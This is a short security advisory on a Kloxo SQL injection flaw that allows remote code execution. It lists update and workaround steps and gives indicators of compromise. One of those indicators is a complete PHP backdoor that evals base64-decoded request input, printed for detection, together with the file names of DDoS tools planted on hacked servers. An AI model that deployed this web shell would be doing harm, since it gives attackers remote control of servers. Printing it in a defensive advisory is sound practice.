Kloxo SQL Injection Vulnerability

Impact

• Remote Code Execution

System / Technologies affected

• Kloxo versions prior to 6.1.13

Solutions

How to verify server was compromised:

• Under /home/kloxo/httpd/default, search any file which was injected with the following code:
  <?php
  set_time_limit(0);error_reporting(NULL);
  if(($_REQUEST['8ba7afbaaddc67de33a3f'])!=NULL){eval(base64_decode($_REQUEST['8ba7afbaaddc67de33a3f']));}
  else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >';}
  ?>
  If there is any, recover the original file from your backup or update Kloxo.
• Search any of the following files that exist in your server:
  conzx.php fakzx.php indzx.php resuzx.php modzx.php genezx.php
  Please remove these files if there are any since they are used to launch DDoS attack.

Before installation of the software, please visit the software manufacturer web-site for more details.

• Update to version 6.1.13 or above.
  http://project.lxcenter.org/projects/kloxo/news
  It was reported that since Mar 2012 Kloxo did not get any update until last month. Please refer to the above webpage on how to apply the update properly.

If you cannot apply the update, please consider the following workaround:

• Do not use the default admin ports (7777 and 7778).
• Use alternative hosting control panel applications.

Vulnerability Identifier

• No CVE information is available

Source

• vpsBoard
• LxCenter

Related Link

• http://project.lxcenter.org/projects/kloxo/news
• https://vpsboard.com/topic/3384-kloxo-installations-compromised/